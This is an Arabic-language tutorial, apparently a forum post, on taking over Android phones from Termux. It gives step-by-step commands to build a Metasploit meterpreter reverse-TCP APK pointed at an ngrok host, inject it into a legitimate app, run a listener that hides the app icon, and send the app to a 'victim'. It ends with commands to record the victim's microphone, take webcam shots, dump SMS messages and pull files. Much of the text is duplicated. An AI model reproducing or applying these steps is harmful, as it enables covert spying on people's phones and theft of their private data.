السلام عليكم اخوتي واخواتي اليوم جات بشرح عن اداه في تيرمكس وانا اخلي مسؤوليتي عنها كاملا
شرح دمج بايلود وسيطره على الاندرويد باستخدام تيرمكس
[+] الفهرس :
[ تعريف مصطلحات والادوات اللي بنستخدمها ]
[ شرح مبسط اولي ]
[ رابط تحميل تيرمكس ]
[ اساسيات تيرمكس ]
[ تحميل الميتاسبلويت ]
[ تحميل نجروك ]
[ شرح فتح بورت نجروك ]
[ حل عدم فتح بورت ]
[ صنع بايلود تطبيق من الميتا ]
[ فتح جلسة تنصت بايلود تطبيق ]
[ تحميل حاقن تطبيقات ]
[ حقن بايلود في تطبيق ]
[ تفاصيل عن الحاقن ]
[ فتح جلسة تنصت بايلود تطبيق ]
[ اوامر التحكم بجهاز الصحيه ]
[1] تعريف مصطلحات والادوات اللي بنستخدمها
[+] المصطلح الاول
[1] بورت|Port
[=] منفذ او شباك للوصل بين شيئين
[+] المصطلح الثاني
[2] بايلود|pyload
[=] حمولة يتم ارسالها للضحيه لكي يفتح منفذ او باب سري في الجهاز تتيح للمخترق التسلل للجهاز
[+] المصطلح الثالث
[3] جلسة تنصت
[=] مكان ارسال واستقبال الاوامر والملفات من جهازك الى جهاز الضحيه والعكس
[+] السكربت الاول
[1] ميتاسبلوست|ميتا|metasploit
[=] هو عبارة عن مكتبة من الأدوات ، وقواعد بيانات لمجموعة من الثغرات التي يتم اكتشافها
[+] السكربت الثاني
[2] نجروك|ngrok
[=] اداة تقوم بفتح بورت
[+] السكربت الثالث
[3] تيمكس|temux bunch
[=] اداة لحقن البايلودات في التطبيقات
[+] السكربت الرابع
[4] Exploit Android Stagefright
[=] حقن فيديو واختراق الجهاز بفيديو
[-] إنتهى .
[2] شرح مبسط اولي
[+] لكي نخترق جهاز اولا يجب ان نصنع بايلود لكي نرسله الى الضحيه ثم نفتح جلسة تنصت ونربط البايلود و جلسة التنصت باستخدام بورت
[-] إنتهى .
[3] رابط تحميل تيرمكس
[+] رابط التحميل من جوجل بلاي :
[-] https://play.google.com/store/apps/details?id=com.termux
[-] إنتهى .
[4] اساسيات تيرمكس
[+] افتح تيرمكس
[+] اكتب الاوامر التالية :
[1] termux-setup-storage
[2] pkg update -y
[3] pkg upgrade -y
[4] pkg install git -y
[5] pkg install python -y
[6] pkg install python2 -y
[7] pkg install curl -y
[8] pkg install wget -y
[9] pkg install ruby -y
[10] pkg install perl -y
[11] pkg install proot -y
[-] إنتهى .
[5] تحميل الميتاسبلويت
[+] افتح تيرمكس
[+] اكتب الاوامر التالية :
[1] git clone
https://github.com/rapid7/metasploit-framework.git
[4] cd metaaploit-framework
[5] bundle install rake-12.3.1
[6] bundle config build.nokogiri--use-system--libraries
[7] gem install nokogiri
[8] gem install pkg-config -v rake-12.3.1
[9] bundle install rake-12.3.1
[-] إنتهى .
[6] تحميل نجروك
[1] الدخول الى الرابط التالي وهو موقع نجروك الاساسي :
[×] https://ngrok.com
[2] الضغط على كلمة sign up التي بالاحمر لتسجيل حساب جديد
[3] إملاء الخانات التاليه المعروضة في الموقع :
[+] your name|اسمك
[+] your email|إيميلك
[+] confirm email|اعد كتابة ايميلك
[+] password|كلمة السر
[+] وخذ اختبار الكابتشا
[+] اضغط على sign up
[+] إنتهى شرح تسجيل الدخول
[4] انزل الى الاسفل وسنجد 4 مربعات
[+] المربع الاول : download ngrok
[+] المربع الثاني : unzip to install
[+] المربع الثالث : confirm your account
[+] المربع الرابع : fire it up
[-] سنحتاج الاول والثالث فقط
[5] نضغط المريع الاول وسيبدء التحميل
[-] مابعد التحميل :
[+] ادخل الى تيرمكس
[1] cd /sdcard/download
[+] امر الدخول الى الذاكرة الداخليه/ملف التحميلات
[2] cp ngrok-stable-linux-arm.zip $HOME
[+] امر نسخ ملف النجروك الى الهوم
[3] cd $HOME
[+] امر الدخول للهوم
[4] unzip ngrok-stable-linux-arm.zip
[+] فك الضغط عن ملف نجروك
[5] rm ngrok-stable-linux-arm.zip
[+] امر حذف الملف المضغوط
[!] الدخول الى الموقع والتوجه الى المربع الثالث ستجدون رمز طويل بالخط الابيض وخلفيه سوداء انسخوه
[+] اذهبو الى تيرمكس
[6] الصقو الرمز
[-] إنتهى .
[7] شرح فتح بورت نجروك
[+] الدخول الى تيرمكس
[+] الفهرس :
[ تعريف مصطلحات والادوات اللي بنستخدمها ]
[ شرح مبسط اولي ]
[ رابط تحميل تيرمكس ]
[ اساسيات تيرمكس ]
[ تحميل الميتاسبلويت ]
[ تحميل نجروك ]
[ شرح فتح بورت نجروك ]
[ حل عدم فتح بورت ]
[ صنع بايلود تطبيق من الميتا ]
[ فتح جلسة تنصت بايلود تطبيق ]
[ تحميل حاقن تطبيقات ]
[ حقن بايلود في تطبيق ]
[ تفاصيل عن الحاقن ]
[ فتح جلسة تنصت بايلود تطبيق ]
[ اوامر التحكم بجهاز الصحيه ]
[1] تعريف مصطلحات والادوات اللي بنستخدمها
[+] المصطلح الاول
[1] بورت|Port
[=] منفذ او شباك للوصل بين شيئين
[+] المصطلح الثاني
[2] بايلود|pyload
[=] حمولة يتم ارسالها للضحيه لكي يفتح منفذ او باب سري في الجهاز تتيح للمخترق التسلل للجهاز
[+] المصطلح الثالث
[3] جلسة تنصت
[=] مكان ارسال واستقبال الاوامر والملفات من جهازك الى جهاز الضحيه والعكس
[+] السكربت الاول
[1] ميتاسبلوست|ميتا|metasploit
[=] هو عبارة عن مكتبة من الأدوات ، وقواعد بيانات لمجموعة من الثغرات التي يتم اكتشافها
[+] السكربت الثاني
[2] نجروك|ngrok
[=] اداة تقوم بفتح بورت
[+] السكربت الثالث
[3] تيمكس|temux bunch
[=] اداة لحقن البايلودات في التطبيقات
[+] السكربت الرابع
[4] Exploit Android Stagefright
[=] حقن فيديو واختراق الجهاز بفيديو
[-] إنتهى .
[2] شرح مبسط اولي
[+] لكي نخترق جهاز اولا يجب ان نصنع بايلود لكي نرسله الى الضحيه ثم نفتح جلسة تنصت ونربط البايلود و جلسة التنصت باستخدام بورت
[-] إنتهى .
[3] رابط تحميل تيرمكس
[+] رابط التحميل من جوجل بلاي :
[-] https://play.google.com/store/apps/details?id=com.termux
[-] إنتهى .
[4] اساسيات تيرمكس
[+] افتح تيرمكس
[+] اكتب الاوامر التالية :
[1] termux-setup-storage
[2] pkg update -y
[3] pkg upgrade -y
[4] pkg install git -y
[5] pkg install python -y
[6] pkg install python2 -y
[7] pkg install curl -y
[8] pkg install wget -y
[9] pkg install ruby -y
[10] pkg install perl -y
[11] pkg install proot -y
[-] إنتهى .
[5] تحميل الميتاسبلويت
[+] افتح تيرمكس
[+] اكتب الاوامر التالية :
[1] git clone
https://github.com/rapid7/metasploit-framework.git
[4] cd metaaploit-framework
[5] bundle install rake-12.3.1
[6] bundle config build.nokogiri--use-system--libraries
[7] gem install nokogiri
[8] gem install pkg-config -v rake-12.3.1
[9] bundle install rake-12.3.1
[-] إنتهى .
[6] تحميل نجروك
[1] الدخول الى الرابط التالي وهو موقع نجروك الاساسي :
[×] https://ngrok.com
[2] الضغط على كلمة sign up التي بالاحمر لتسجيل حساب جديد
[3] إملاء الخانات التاليه المعروضة في الموقع :
[+] your name|اسمك
[+] your email|إيميلك
[+] confirm email|اعد كتابة ايميلك
[+] password|كلمة السر
[+] وخذ اختبار الكابتشا
[+] اضغط على sign up
[+] إنتهى شرح تسجيل الدخول
[4] انزل الى الاسفل وسنجد 4 مربعات
[+] المربع الاول : download ngrok
[+] المربع الثاني : unzip to install
[+] المربع الثالث : confirm your account
[+] المربع الرابع : fire it up
[-] سنحتاج الاول والثالث فقط
[5] نضغط المريع الاول وسيبدء التحميل
[-] مابعد التحميل :
[+] ادخل الى تيرمكس
[1] cd /sdcard/download
[+] امر الدخول الى الذاكرة الداخليه/ملف التحميلات
[2] cp ngrok-stable-linux-arm.zip $HOME
[+] امر نسخ ملف النجروك الى الهوم
[3] cd $HOME
[+] امر الدخول للهوم
[4] unzip ngrok-stable-linux-arm.zip
[+] فك الضغط عن ملف نجروك
[5] rm ngrok-stable-linux-arm.zip
[+] امر حذف الملف المضغوط
[!] الدخول الى الموقع والتوجه الى المربع الثالث ستجدون رمز طويل بالخط الابيض وخلفيه سوداء انسخوه
[+] اذهبو الى تيرمكس
[6] الصقو الرمز
[-] إنتهى .
[7] شرح فتح بورت نجروك
[+] الدخول الى تيرمكس
[1] cd $HOME
[2] ./ngrok tcp [port]
[!] يفضل فتح البورت 4444 او 8080
[°] مثال : ./ngrok tcp 4444
[!] طريقة التاكد من ان البورت مفتوح
[+] ظهور كلمة online بالاخضر
[-] إنتهى .
[8] حل عدم فتح بورت
[+] الذهاب الى تيرمكس
[1] apt update
[2] apt upgrade
[3] pkg install proot
[4] termux-chroot
[-] اذا لم ينجح :
[+] فعل الفي بي ان
[-] اذا لم ينجح :
[+] غير تحديث التيرمكس
[-] اذا لم ينجح :
[-] المشكلة ليست مع الطريقة ستكون المشكلة من مزود الخدمه بعض الشركات لا تسمح بفتح بورتات في الشبكة
[-] إنتهى .
[9] صنع بايلود تطبيق من الميتا
[+] ادخل الى التيرمكس
[+] فتح بورت ونسخ البورت المفتوح
[1] cd $HOME/metasploit-framework
[2] msfvenom -p android/meterpreter/reverse_tcp LHOST=tcp://0.tcp.ngrok.io LPORT=$port -o /sdcard/$name.apk
[+]
مكان $port ضعو البورت المقتوح
[+] مكان $name ضعو اسم التطبيق
[!] سيتم صنع البورت ونقله الى الصفحه الرئيسية من الذاكرة الداخليه
[-] إنتهى .
[10] فتح جلسة تنصت بايلود تطبيق
[+] الذهاب الى تيرمكس
[1] cd /$HOME/metasploit-framework
[2] ./msfconsole
[3] use exploit/multi/handler
[4] set payload android/meterpreter/reverse_tcp
[5] set lhost tcp://0.tcp.ngrok.io
[6] set lport $port
[7] exploit -x hide_app_icon
[+] ارسل التطبيق الى الضحيه
[-] إنتهى .
[11] تحميل حاقن تطبيقات
[+] اسم سكربت الحاقن هو temux-bunch
[+] الدخول الى تيرمكس
[1] git clone https://github.com/Hax4us/Tmux-Bunch
[2] cd $HOME
[3] cd Tmux-Bunch
[4] chmod +x ./setup
[5] ./setup
[-] إنتهى .
[12] حقن بايلود في تطبيق
[+] نضع التطبيق المراد حقنه في تلصفحة الرئيسية من الذاكرة الداخليه
[+] نفتح بورت في الشبكه
[+] الدخول الى تيرمكس
[1] cd /sdcard
[2] mv $name.apk $HOME
[3] cd $HOME
[4] mv $name.apk temux-bunch
[5] cd tmux-bunch
[6] mv $name.apk binder
[7] ./tmuxbunch
[8] 6
[9] 1
[10] tcp://0.tcp.ngrok.io
[11] $port
[12] $name
[13] اضغط انتر مرتين
[14] 10
[15] انتر
[16] cd embout
[17] mv $name.apk $HOME
[18] cd ..\..
[19] mv $name.apk /sdcard
[+] ستجد التطبيق في الصفحه الرئيسيه من الذاكره الداخليه
[-] إنتهى .
[13] تفاصيل عن الحاقن
[+] بعض الاحيان لن يستطيع الحاقن من حقن البايلود في تطبيق لان التطبيق محمي
[14] فتح جلسة التنصت تطبيق بايلود تطبيق
[+] الذهاب الى تيرمكس
[1] cd /$HOME/metasploit-framework
[2] ./msfconsole
[3] use exploit/multi/handler
[4] set payload android/meterpreter/reverse_tcp
[5] set lhost tcp://0.tcp.ngrok.io
[6] set lport $port
[7] exploit -x hide_app_icon
[+] ارسل التطبيق الى الضحيه
[-] إنتهى .
[15] اوامر التحكم بجهاز الضحيه
[1] reboot
[=] لاعادة تشغيل جهاز الضحيه
[2] shultdown
[=] لاطفاء جهاز الضحيه
[3] screenshot
[=] لتصوير شاشة الضحيه
[4] ps
[=] لاظهار البرامج الشغاله في جهاز الضحيه
[5] upload /sdcard/$name.apk \$name.apk
[=] لارسال برنامج او كلف الى جهاز الضحيه
[6] download $name.apk
[=] لتحميل ملف من جهاز الضحيه الى جهازك
[7] cd /sdcard
[=] لدخول الى ملفات الضحيه
[8] rm $name.name
[=] لحذف ملف من جهاز الضحيه
[9] record_mic -d $s
[=] لتسجيل صوت من جهاز الضحيه
[°] $s تمثل عدد ثواني التسجيل
[10] webcam_snap
[=] لتصوير من الكاميرا الاماميه
[11] webcam_stream -d $s
[=] لتصوير فيديو من الكاميرا الاماميه
[+] dump_sms
[=] لاظهار رسائل الاس ام اس
[+] cd $file
[°] تمثل $file اسم الملف
[=] للدخول الى ملف معين
[+] cd ..
[=] للرجوع الى الملف السابق
[+] cd /sdcard1
[=] للدخول الى الذاكرة الخارجيه
[-] إنتهى .
انشر ولا تسرق ويا رب تكونو استمتعو في الشرح